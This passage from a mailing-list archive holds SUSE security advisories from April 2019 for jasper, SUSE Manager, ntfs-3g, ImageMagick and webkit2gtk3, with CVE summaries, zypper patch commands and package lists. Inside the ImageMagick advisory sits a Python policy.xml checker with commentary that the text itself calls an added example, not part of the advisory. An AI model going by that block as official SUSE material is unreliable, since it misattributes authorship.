   https://bugzilla.suse.com/1125600
   https://bugzilla.suse.com/1125744
   https://bugzilla.suse.com/1126075
   https://bugzilla.suse.com/1126099
   https://bugzilla.suse.com/1126518
   https://bugzilla.suse.com/1127542
   https://bugzilla.suse.com/1128228
   https://bugzilla.suse.com/1128724
   https://bugzilla.suse.com/1128781
   https://bugzilla.suse.com/1129765
   https://bugzilla.suse.com/1129851
   https://bugzilla.suse.com/1129956
   https://bugzilla.suse.com/1130658
   https://bugzilla.suse.com/1131490
   https://bugzilla.suse.com/1131677
   https://bugzilla.suse.com/1131721
   https://bugzilla.suse.com/1132579

From sle-security-updates at lists.suse.com Wed Apr 24 09:43:09 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Wed, 24 Apr 2019 17:43:09 +0200 (CEST)
Subject: SUSE-SU-2019:1018-1: moderate: Security update for jasper
Message-ID: <20190424154309.0B40D1013D@maintenance.suse.de>

SUSE Security Update: Security update for jasper
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:1018-1
Rating:             moderate
References:         #1010783 #1117505 #1117511
Cross-References:   CVE-2016-9396 CVE-2018-19539 CVE-2018-19542
Affected Products:
                    SUSE Linux Enterprise Module for Open Buildservice Development Tools 15
                    SUSE Linux Enterprise Module for Desktop Applications 15
                    SUSE Linux Enterprise Module for Basesystem 15
______________________________________________________________________________

   An update that fixes three vulnerabilities is now available.

Description:

   This update for jasper fixes the following issues:

   Security issues fixed:

   - CVE-2018-19542: Fixed a denial of service in jp2_decode (bsc#1117505).
   - CVE-2018-19539: Fixed a denial of service in jas_image_readcmpt (bsc#1117511).
   - CVE-2016-9396: Fixed a denial of service in jpc_cox_getcompparms (bsc#1010783).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-1018=1 - SUSE Linux Enterprise Module for Desktop Applications 15: zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-1018=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-1018=1 Package List: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): jasper-2.0.14-3.3.2 jasper-debuginfo-2.0.14-3.3.2 jasper-debugsource-2.0.14-3.3.2 - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64): jasper-debuginfo-2.0.14-3.3.2 jasper-debugsource-2.0.14-3.3.2 libjasper-devel-2.0.14-3.3.2 - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): jasper-debuginfo-2.0.14-3.3.2 jasper-debugsource-2.0.14-3.3.2 libjasper4-2.0.14-3.3.2 libjasper4-debuginfo-2.0.14-3.3.2 References: https://www.suse.com/security/cve/CVE-2016-9396.html https://www.suse.com/security/cve/CVE-2018-19539.html https://www.suse.com/security/cve/CVE-2018-19542.html https://bugzilla.suse.com/1010783 https://bugzilla.suse.com/1117505 https://bugzilla.suse.com/1117511 From sle-security-updates at lists.suse.com Wed Apr 24 09:44:09 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 24 Apr 2019 17:44:09 +0200 (CEST) Subject: SUSE-SU-2019:1006-1: moderate: Security update for SUSE Manager Server 3.2 Message-ID: <20190424154409.C85C2FDF1@maintenance.suse.de> SUSE Security Update: Security update for SUSE Manager Server 3.2 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1006-1 Rating: moderate References: #1070731 #1109316 #1120242 #1121195 #1122230 #1122381 #1122837 #1124290 #1125600 #1125744 #1126075 #1126099 #1126518 #1127542 
#1128228 #1128724 #1128781 #1129765 #1129851 #1129956 #1130658 #1131490 #1131677 #1131721 #1132579
Cross-References: CVE-2017-7957
Affected Products:
SUSE Manager Server 3.2
SUSE Manager Proxy 3.2
______________________________________________________________________________

An update that solves one vulnerability and has 24 fixes is now available.

Description:

This update includes the following new features:

- Add configuration option to limit the number of changelog entries added to the repository metadata (fate#325676)

This update fixes the following issues:

apache-commons-lang3:
- Run fdupes on javadoc
- Specify java target and source level 1.6 to make package compatible with JDK >= 1.8

cobbler:
- Fixes case where distribution detection returns None (bsc#1130658)
- SUSE texmode fix (bsc#1109316)

drools:
- Update Drools to 7.17.0
- Release Notes: https://issues.jboss.org/secure/ReleaseNote.jspa
- Fixes for SLE 15 compatibility

guava:
- Updated from 13.0.1 to 27.0.1
- Changes between 13.0.1 and 23.0:
  https://github.com/google/guava/wiki/Release14
  https://github.com/google/guava/wiki/Release15
  https://github.com/google/guava/wiki/Release16
  https://github.com/google/guava/wiki/Release17
  https://github.com/google/guava/wiki/Release18
  https://github.com/google/guava/wiki/Release19
  https://github.com/google/guava/wiki/Release23
- Changes between 23.0 and 27.0.1: see https://github.com/google/guava/releases

jade4j:
- Conditional java/java-devel requires based on os version
- Update dependency version for commons-lang3 to 3.4
- Fix building javadoc

kie-api:
- Update KIE to 7.17.0
- Release notes: https://issues.jboss.org/secure/ReleaseNote.jspa

optaplanner:
- Update Optaplanner to 7.17.0

py26-compat-salt:
- Fix minion arguments assign via sysctl (bsc#1124290)

smdba:
- Make 'smdba space-overview' postgresql version agnostic (bsc#1129956)
- Fix version mismatch

spacecmd:
- Fix system_delete with SSM (bsc#1125744)

spacewalk-admin:
- Fix encoding bug in salt event processing (bsc#1129851)

spacewalk-backend:
- Fix linking of packages in reposync (bsc#1131677)
- Fix: handle non-standard filenames for comps.xml (bsc#1120242)
- Mgr-sign-metadata can optionally clear-sign metadata files

spacewalk-branding:
- Introduce a description label for the new 'minion-checkin' Taskomatic job (bsc#1122837)

spacewalk-certs-tools:
- Add support for Ubuntu to bootstrap script
- Clean up downloaded gpg keys after bootstrap (bsc#1126075)

spacewalk-java:
- Fix base channel selection for Ubuntu systems (bsc#1132579)
- Fix retrieval of build time for .deb repositories (bsc#1131721)
- Allow access to susemanager tools channels without res subscription (bsc#1127542)
- Add support for SLES 15 live patches in CVE audit
- Add a Taskomatic job to perform minion check-in regularly, drop use of Salt's Mine (bsc#1122837)
- Fix errata_details to return details correctly (bsc#1128228)
- Support ubuntu products and debian architectures in mgr-sync
- Adapt check for available repositories to debian style repositories
- Add support for custom username when bootstrapping with Salt-SSH
- Read and update running kernel release value at each startup of minion (bsc#1122381)
- Add error message on sync refresh when there are no scc credentials
- Fix apidoc issues
- Fix deleting server when minion_formulas.json is empty (bsc#1122230)
- Minion-action-cleanup Taskomatic task: do not clean actions younger than one hour
- Schedule full package refresh only once per action chain if needed (bsc#1126518)
- Check and schedule package refresh in response to events independently of what originates them (bsc#1126099)
- Add configuration option to limit the number of changelog entries added to the repository metadata (fate#325676)
- Generate InRelease file for Debian/Ubuntu repos when metadata signing is enabled

spacewalk-web:
- Show undetected subscription-matching message object as a string anyway (bsc#1125600)
- Fix action scheduler time picker prefill when the server is on "UTC/GMT" timezone (bsc#1121195)
- Allow username input on bootstrap page when using Salt-SSH
- Add cache buster for static files (js/css) to fix caching issues after upgrading.

subscription-matcher:
- Update dependencies (Drools, Optaplanner, Guava, Xstream)
- Make the java and java-devel requirements variable
- Relax the requirement condition on apache-commons-lang3

susemanager:
- Support creating bootstrap repos for Ubuntu 18.04 and 16.04.
- Allow alternative names for bootstrap packages, to allow using old client tools after package renames
- Feat: create Ubuntu empty repository
- Fix creation of bootstrap repositories for SLE12 (no SP) by requiring python-setuptools only for SLE12 >= SP1 (bsc#1129765)
- Add bootstrap repo definition for SLE15 SP1

susemanager-docs_en:
- Update text and image files.
- Fix bad link.
- Update Manual Backup and smdba sections.
- Troubleshooting Salt clients.
- Fix package endpoint in salt pillar content.
- Ubuntu Clients supported.
- Change License to GFL 1.2, as it is the real license for the doc since 3.2.0

susemanager-schema:
- Add a Taskomatic job to perform minion check-in regularly, drop use of Salt's Mine (bsc#1122837)
- Fix performance regression in inter-server-sync (bsc#1128781)
- Set minion-action-cleanup run frequency from hourly to daily at midnight

susemanager-sls:
- Update get_kernel_live_version module to support older Salt versions (bsc#1131490)
- Update get_kernel_live_version module to support SLES 15 live patches
- Do not configure Salt Mine in newly registered minions (bsc#1122837)
- Fix Salt error related to remove_traditional_stack when bootstrapping an Ubuntu minion (bsc#1128724)
- Automatically trust SUSE GPG key for client tools channels on Ubuntu systems
- Util.systeminfo sls has been added to perform different actions at minion startup (bsc#1122381)

susemanager-sync-data:
- Allow access to susemanager tools channels without res subscription (bsc#1127542)
- Add Ubuntu product definitions
- Adapt to SCC changes
- Add CaaSP 4 Toolchain

xstream:
- Update xstream to 1.4.10
- Major changes:
  - CVE-2017-7957: XStream could cause a Denial of Service when unmarshalling void. (bsc#1070731)
  - New XStream artifact with -java7 appended as version suffix for a library explicitly without the Java 8 stuff (lambda expression support, converters for java.time.* package).
  - Improve performance by minimizing call stack of mapper chain.
  - XSTR-774: Add converters for types of java.time, java.time.chrono, and java.time.temporal packages (converters for LocalDate, LocalDateTime, LocalTime, OffsetDateTime, and ZonedDateTime by Matej Cimbora).
  - JavaBeanConverter does not respect ignored unknown elements.
  - Add XStream.setupDefaultSecurity to initialize security framework with defaults of XStream 1.5.x.
  - Emit error warning if security framework has not been initialized and the XStream instance is vulnerable to known exploits.
- Feat: modify patch to be compatible with JDK 11 building
- Fixes for SLE 15 compatibility

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product: - SUSE Manager Server 3.2: zypper in -t patch SUSE-SUSE-Manager-Server-3.2-2019-1006=1 - SUSE Manager Proxy 3.2: zypper in -t patch SUSE-SUSE-Manager-Proxy-3.2-2019-1006=1 Package List: - SUSE Manager Server 3.2 (ppc64le s390x x86_64): reprepro-5.3.0-2.3.3 smdba-1.6.4-0.3.9.3 spacewalk-branding-2.8.5.15-3.19.3 susemanager-3.2.17-3.22.4 susemanager-tools-3.2.17-3.22.4 - SUSE Manager Server 3.2 (noarch): apache-commons-lang3-3.4-3.3.3 cobbler-2.6.6-6.16.3 drools-7.17.0-3.3.3 guava-27.0.1-3.3.3 jade4j-1.0.7-3.3.3 kie-api-7.17.0-3.3.3 kie-soup-7.17.0.Final-2.3.3 optaplanner-7.17.0-3.3.3 py26-compat-salt-2016.11.10-6.21.3 python2-spacewalk-certs-tools-2.8.8.7-3.6.3 spacecmd-2.8.25.10-3.20.3 spacewalk-admin-2.8.4.4-3.6.3 spacewalk-backend-2.8.57.14-3.25.3 spacewalk-backend-app-2.8.57.14-3.25.3 spacewalk-backend-applet-2.8.57.14-3.25.3 spacewalk-backend-config-files-2.8.57.14-3.25.3 spacewalk-backend-config-files-common-2.8.57.14-3.25.3 spacewalk-backend-config-files-tool-2.8.57.14-3.25.3 spacewalk-backend-iss-2.8.57.14-3.25.3 spacewalk-backend-iss-export-2.8.57.14-3.25.3 spacewalk-backend-libs-2.8.57.14-3.25.3 spacewalk-backend-package-push-server-2.8.57.14-3.25.3 spacewalk-backend-server-2.8.57.14-3.25.3 spacewalk-backend-sql-2.8.57.14-3.25.3 spacewalk-backend-sql-oracle-2.8.57.14-3.25.3 spacewalk-backend-sql-postgresql-2.8.57.14-3.25.3 spacewalk-backend-tools-2.8.57.14-3.25.3 spacewalk-backend-xml-export-libs-2.8.57.14-3.25.3 spacewalk-backend-xmlrpc-2.8.57.14-3.25.3 spacewalk-base-2.8.7.15-3.24.3 spacewalk-base-minimal-2.8.7.15-3.24.3 spacewalk-base-minimal-config-2.8.7.15-3.24.3 spacewalk-certs-tools-2.8.8.7-3.6.3 spacewalk-html-2.8.7.15-3.24.3 spacewalk-java-2.8.78.21-3.29.1 spacewalk-java-config-2.8.78.21-3.29.1 spacewalk-java-lib-2.8.78.21-3.29.1 spacewalk-java-oracle-2.8.78.21-3.29.1 spacewalk-java-postgresql-2.8.78.21-3.29.1 spacewalk-taskomatic-2.8.78.21-3.29.1 subscription-matcher-0.23-4.12.3 
susemanager-schema-3.2.18-3.22.3 susemanager-sls-3.2.23-3.26.3 susemanager-sync-data-3.2.14-3.20.3 susemanager-web-libs-2.8.7.15-3.24.3 xstream-1.4.10-4.3.3 - SUSE Manager Proxy 3.2 (noarch): python2-spacewalk-certs-tools-2.8.8.7-3.6.3 spacewalk-backend-2.8.57.14-3.25.3 spacewalk-backend-libs-2.8.57.14-3.25.3 spacewalk-base-minimal-2.8.7.15-3.24.3 spacewalk-base-minimal-config-2.8.7.15-3.24.3 spacewalk-certs-tools-2.8.8.7-3.6.3 susemanager-web-libs-2.8.7.15-3.24.3 References: https://www.suse.com/security/cve/CVE-2017-7957.html https://bugzilla.suse.com/1070731 https://bugzilla.suse.com/1109316 https://bugzilla.suse.com/1120242 https://bugzilla.suse.com/1121195 https://bugzilla.suse.com/1122230 https://bugzilla.suse.com/1122381 https://bugzilla.suse.com/1122837 https://bugzilla.suse.com/1124290 https://bugzilla.suse.com/1125600 https://bugzilla.suse.com/1125744 https://bugzilla.suse.com/1126075 https://bugzilla.suse.com/1126099 https://bugzilla.suse.com/1126518 https://bugzilla.suse.com/1127542 https://bugzilla.suse.com/1128228 https://bugzilla.suse.com/1128724 https://bugzilla.suse.com/1128781 https://bugzilla.suse.com/1129765 https://bugzilla.suse.com/1129851 https://bugzilla.suse.com/1129956 https://bugzilla.suse.com/1130658 https://bugzilla.suse.com/1131490 https://bugzilla.suse.com/1131677 https://bugzilla.suse.com/1131721 https://bugzilla.suse.com/1132579 From sle-security-updates at lists.suse.com Wed Apr 24 09:49:49 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 24 Apr 2019 17:49:49 +0200 (CEST) Subject: SUSE-SU-2019:1001-1: moderate: Security update for ntfs-3g_ntfsprogs Message-ID: <20190424154949.07451FDF1@maintenance.suse.de> SUSE Security Update: Security update for ntfs-3g_ntfsprogs ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1001-1 Rating: moderate References: #1130165 Cross-References: CVE-2019-9755 Affected Products: SUSE Linux 
Enterprise Workstation Extension 15 SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for ntfs-3g_ntfsprogs fixes the following issues: Security issues fixed: - CVE-2019-9755: Fixed a heap-based buffer overflow which could lead to local privilege escalation (bsc#1130165). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Workstation Extension 15: zypper in -t patch SUSE-SLE-Product-WE-15-2019-1001=1 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-1001=1 Package List: - SUSE Linux Enterprise Workstation Extension 15 (x86_64): libntfs-3g87-2016.2.22-3.3.2 libntfs-3g87-debuginfo-2016.2.22-3.3.2 ntfs-3g-2016.2.22-3.3.2 ntfs-3g-debuginfo-2016.2.22-3.3.2 ntfs-3g_ntfsprogs-debuginfo-2016.2.22-3.3.2 ntfs-3g_ntfsprogs-debugsource-2016.2.22-3.3.2 ntfsprogs-2016.2.22-3.3.2 ntfsprogs-debuginfo-2016.2.22-3.3.2 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): libntfs-3g-devel-2016.2.22-3.3.2 ntfs-3g_ntfsprogs-debuginfo-2016.2.22-3.3.2 ntfs-3g_ntfsprogs-debugsource-2016.2.22-3.3.2 ntfsprogs-extra-2016.2.22-3.3.2 ntfsprogs-extra-debuginfo-2016.2.22-3.3.2 References: https://www.suse.com/security/cve/CVE-2019-9755.html https://bugzilla.suse.com/1130165 From sle-security-updates at lists.suse.com Wed Apr 24 09:51:42 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 24 Apr 2019 17:51:42 +0200 (CEST) Subject: SUSE-SU-2019:1019-1: moderate: Security update for ImageMagick Message-ID: <20190424155142.31123FDF1@maintenance.suse.de> 
SUSE Security Update: Security update for ImageMagick
______________________________________________________________________________

Announcement ID: SUSE-SU-2019:1019-1
Rating: moderate
References: #1122033 #1130330 #1131317 #1132054 #1132060
Cross-References: CVE-2019-10650 CVE-2019-11007 CVE-2019-11008 CVE-2019-9956
Affected Products:
SUSE Linux Enterprise Module for Open Buildservice Development Tools 15
SUSE Linux Enterprise Module for Development Tools 15
SUSE Linux Enterprise Module for Desktop Applications 15
______________________________________________________________________________

An update that solves four vulnerabilities and has one errata is now available.

Description:

This update for ImageMagick fixes the following issues:

Security issues fixed:
- CVE-2019-9956: Fixed a stack-based buffer overflow in PopHexPixel() (bsc#1130330).
- CVE-2019-10650: Fixed a heap-based buffer over-read in WriteTIFFImage() (bsc#1131317).
- CVE-2019-11007: Fixed a heap-based buffer overflow in ReadMNGImage() (bsc#1132060).
- CVE-2019-11008: Fixed a heap-based buffer overflow in WriteXWDImage() (bsc#1132054).
- Added extra -config- packages with the Postscript/EPS/PDF readers still enabled. SUSE disables the PS decoders by default to harden ImageMagick against security issues in ghostscript, which those decoders hand their input to; enabling them again gives up that protection (bsc#1122033). Two packages can be selected:
  - ImageMagick-config-7-SUSE: PS decoders disabled.
  - ImageMagick-config-7-upstream: PS decoders enabled.
  Depending on your local needs install either one of them. The default is the -SUSE configuration.

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
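Which of the two -config- packages is active shows up in policy.xml as the rights granted to the Ghostscript-backed coders. The Python below is an added example, not part of this advisory and not ImageMagick or SUSE code: it parses a policy.xml and lists the PS, PS2, PS3, EPS, PDF and XPS coders that are still reachable. The two embedded policy documents are constructed stand-ins for the -SUSE and -upstream variants (only the entries relevant to the check, not the files actually shipped), and the path /etc/ImageMagick-7/policy.xml used by check_installed is an assumption.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

# Coders that hand their input to Ghostscript. If policy.xml does not deny
# them, ImageMagick invokes Ghostscript for any input it sniffs as
# PostScript or PDF, regardless of the file extension.
GS_CODERS = ("PS", "PS2", "PS3", "EPS", "PDF", "XPS")


def coder_rights(policy_xml: str) -> Dict[str, str]:
    """Map each <policy domain="coder"> pattern to its rights attribute."""
    root = ET.fromstring(policy_xml)
    return {
        pol.get("pattern", ""): pol.get("rights", "")
        for pol in root.iter("policy")
        if pol.get("domain") == "coder"
    }


def _pattern_names(pattern: str) -> List[str]:
    # policy.xml accepts a single coder name, "*" for every coder, or a
    # brace list such as "{PS,PDF}".
    if pattern.startswith("{") and pattern.endswith("}"):
        return [n.strip() for n in pattern[1:-1].split(",")]
    return [pattern]


def ghostscript_exposed(policy_xml: str) -> List[str]:
    """Return the Ghostscript-backed coders the policy leaves enabled.

    An empty list means the PS/EPS/PDF readers are disabled, which is the
    state the -SUSE configuration package is meant to provide.
    """
    denied = set()
    for pattern, rights in coder_rights(policy_xml).items():
        if "none" not in rights:
            continue
        names = _pattern_names(pattern)
        denied.update(GS_CODERS if "*" in names else names)
    return [c for c in GS_CODERS if c not in denied]


# Constructed stand-ins for the two configurations: not the files SUSE
# ships, only the coder entries that matter for this check.
POLICY_SUSE = """<policymap>
  <policy domain="coder" rights="none" pattern="{PS,PS2,PS3,EPS,PDF,XPS}" />
</policymap>"""

POLICY_UPSTREAM = """<policymap>
  <policy domain="resource" name="memory" value="256MiB" />
  <policy domain="coder" rights="read|write" pattern="PDF" />
</policymap>"""


def check_installed(path: str = "/etc/ImageMagick-7/policy.xml") -> List[str]:
    """Run the check against the live policy file (the path is an assumption)."""
    with open(path, encoding="utf-8") as fh:
        return ghostscript_exposed(fh.read())


if __name__ == "__main__":
    for label, doc in (("-SUSE", POLICY_SUSE), ("-upstream", POLICY_UPSTREAM)):
        left = ghostscript_exposed(doc)
        state = "hardened" if not left else "Ghostscript reachable via " + ", ".join(left)
        print(f"{label}: {state}")
```

On a host you can cross-check the parsed result against what ImageMagick itself reports with `identify -list policy`, which prints the coder rights after all policy files have been merged.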
Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-1019=1 - SUSE Linux Enterprise Module for Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-15-2019-1019=1 - SUSE Linux Enterprise Module for Desktop Applications 15: zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-1019=1 Package List: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): ImageMagick-debuginfo-7.0.7.34-3.54.3 ImageMagick-debugsource-7.0.7.34-3.54.3 ImageMagick-extra-7.0.7.34-3.54.3 ImageMagick-extra-debuginfo-7.0.7.34-3.54.3 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (noarch): ImageMagick-doc-7.0.7.34-3.54.3 - SUSE Linux Enterprise Module for Development Tools 15 (aarch64 ppc64le s390x x86_64): ImageMagick-debuginfo-7.0.7.34-3.54.3 ImageMagick-debugsource-7.0.7.34-3.54.3 perl-PerlMagick-7.0.7.34-3.54.3 perl-PerlMagick-debuginfo-7.0.7.34-3.54.3 - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64): ImageMagick-7.0.7.34-3.54.3 ImageMagick-config-7-SUSE-7.0.7.34-3.54.3 ImageMagick-config-7-upstream-7.0.7.34-3.54.3 ImageMagick-debuginfo-7.0.7.34-3.54.3 ImageMagick-debugsource-7.0.7.34-3.54.3 ImageMagick-devel-7.0.7.34-3.54.3 libMagick++-7_Q16HDRI4-7.0.7.34-3.54.3 libMagick++-7_Q16HDRI4-debuginfo-7.0.7.34-3.54.3 libMagick++-devel-7.0.7.34-3.54.3 libMagickCore-7_Q16HDRI6-7.0.7.34-3.54.3 libMagickCore-7_Q16HDRI6-debuginfo-7.0.7.34-3.54.3 libMagickWand-7_Q16HDRI6-7.0.7.34-3.54.3 libMagickWand-7_Q16HDRI6-debuginfo-7.0.7.34-3.54.3 References: https://www.suse.com/security/cve/CVE-2019-10650.html https://www.suse.com/security/cve/CVE-2019-11007.html https://www.suse.com/security/cve/CVE-2019-11008.html https://www.suse.com/security/cve/CVE-2019-9956.html https://bugzilla.suse.com/1122033 
https://bugzilla.suse.com/1130330 https://bugzilla.suse.com/1131317 https://bugzilla.suse.com/1132054 https://bugzilla.suse.com/1132060 From sle-security-updates at lists.suse.com Wed Apr 24 10:10:59 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 24 Apr 2019 18:10:59 +0200 (CEST) Subject: SUSE-SU-2019:1000-1: moderate: Security update for ntfs-3g_ntfsprogs Message-ID: <20190424161059.91CAAFDF2@maintenance.suse.de> SUSE Security Update: Security update for ntfs-3g_ntfsprogs ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1000-1 Rating: moderate References: #1130165 Cross-References: CVE-2019-9755 Affected Products: SUSE Linux Enterprise Workstation Extension 12-SP4 SUSE Linux Enterprise Workstation Extension 12-SP3 SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for ntfs-3g_ntfsprogs fixes the following issues: Security issues fixed: - CVE-2019-9755: Fixed a heap-based buffer overflow which could lead to local privilege escalation (bsc#1130165). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". 
Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Workstation Extension 12-SP4: zypper in -t patch SUSE-SLE-WE-12-SP4-2019-1000=1 - SUSE Linux Enterprise Workstation Extension 12-SP3: zypper in -t patch SUSE-SLE-WE-12-SP3-2019-1000=1 - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-1000=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-1000=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1000=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1000=1 Package List: - SUSE Linux Enterprise Workstation Extension 12-SP4 (x86_64): libntfs-3g84-2013.1.13-5.6.1 libntfs-3g84-debuginfo-2013.1.13-5.6.1 ntfs-3g-2013.1.13-5.6.1 ntfs-3g-debuginfo-2013.1.13-5.6.1 ntfs-3g_ntfsprogs-debugsource-2013.1.13-5.6.1 ntfsprogs-2013.1.13-5.6.1 ntfsprogs-debuginfo-2013.1.13-5.6.1 - SUSE Linux Enterprise Workstation Extension 12-SP3 (x86_64): libntfs-3g84-2013.1.13-5.6.1 libntfs-3g84-debuginfo-2013.1.13-5.6.1 ntfs-3g-2013.1.13-5.6.1 ntfs-3g-debuginfo-2013.1.13-5.6.1 ntfs-3g_ntfsprogs-debugsource-2013.1.13-5.6.1 ntfsprogs-2013.1.13-5.6.1 ntfsprogs-debuginfo-2013.1.13-5.6.1 - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): libntfs-3g-devel-2013.1.13-5.6.1 libntfs-3g84-2013.1.13-5.6.1 libntfs-3g84-debuginfo-2013.1.13-5.6.1 ntfs-3g_ntfsprogs-debugsource-2013.1.13-5.6.1 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): libntfs-3g-devel-2013.1.13-5.6.1 libntfs-3g84-2013.1.13-5.6.1 libntfs-3g84-debuginfo-2013.1.13-5.6.1 ntfs-3g_ntfsprogs-debugsource-2013.1.13-5.6.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): libntfs-3g84-2013.1.13-5.6.1 libntfs-3g84-debuginfo-2013.1.13-5.6.1 ntfs-3g-2013.1.13-5.6.1 ntfs-3g-debuginfo-2013.1.13-5.6.1 ntfs-3g_ntfsprogs-debugsource-2013.1.13-5.6.1 
ntfsprogs-2013.1.13-5.6.1 ntfsprogs-debuginfo-2013.1.13-5.6.1 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): libntfs-3g84-2013.1.13-5.6.1 libntfs-3g84-debuginfo-2013.1.13-5.6.1 ntfs-3g-2013.1.13-5.6.1 ntfs-3g-debuginfo-2013.1.13-5.6.1 ntfs-3g_ntfsprogs-debugsource-2013.1.13-5.6.1 ntfsprogs-2013.1.13-5.6.1 ntfsprogs-debuginfo-2013.1.13-5.6.1 References: https://www.suse.com/security/cve/CVE-2019-9755.html https://bugzilla.suse.com/1130165 From sle-security-updates at lists.suse.com Thu Apr 25 07:10:20 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 25 Apr 2019 15:10:20 +0200 (CEST) Subject: SUSE-SU-2019:1030-1: moderate: Security update for webkit2gtk3 Message-ID: <20190425131021.001DEF3D3@maintenance.suse.de> SUSE Security Update: Security update for webkit2gtk3 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1030-1 Rating: moderate References: #1126768 Cross-References: CVE-2019-8375 Affected Products: SUSE Linux Enterprise Workstation Extension 12-SP4 SUSE Linux Enterprise Workstation Extension 12-SP3 SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for webkit2gtk3 fixes the following issues: Security issue fixed: - CVE-2019-8375: Fixed an issue in UIProcess subsystem which could allow the script dialog size to exceed the web view size leading to Buffer Overflow or other unspecified impact (bsc#1126768). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". 
Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Workstation Extension 12-SP4: zypper in -t patch SUSE-SLE-WE-12-SP4-2019-1030=1 - SUSE Linux Enterprise Workstation Extension 12-SP3: zypper in -t patch SUSE-SLE-WE-12-SP3-2019-1030=1 - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-1030=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-1030=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1030=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1030=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1030=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1030=1 Package List: - SUSE Linux Enterprise Workstation Extension 12-SP4 (noarch): libwebkit2gtk3-lang-2.24.0-2.38.2 - SUSE Linux Enterprise Workstation Extension 12-SP3 (noarch): libwebkit2gtk3-lang-2.24.0-2.38.2 - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): typelib-1_0-WebKit2WebExtension-4_0-2.24.0-2.38.2 webkit2gtk3-debugsource-2.24.0-2.38.2 webkit2gtk3-devel-2.24.0-2.38.2 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): typelib-1_0-WebKit2WebExtension-4_0-2.24.0-2.38.2 webkit2gtk3-debugsource-2.24.0-2.38.2 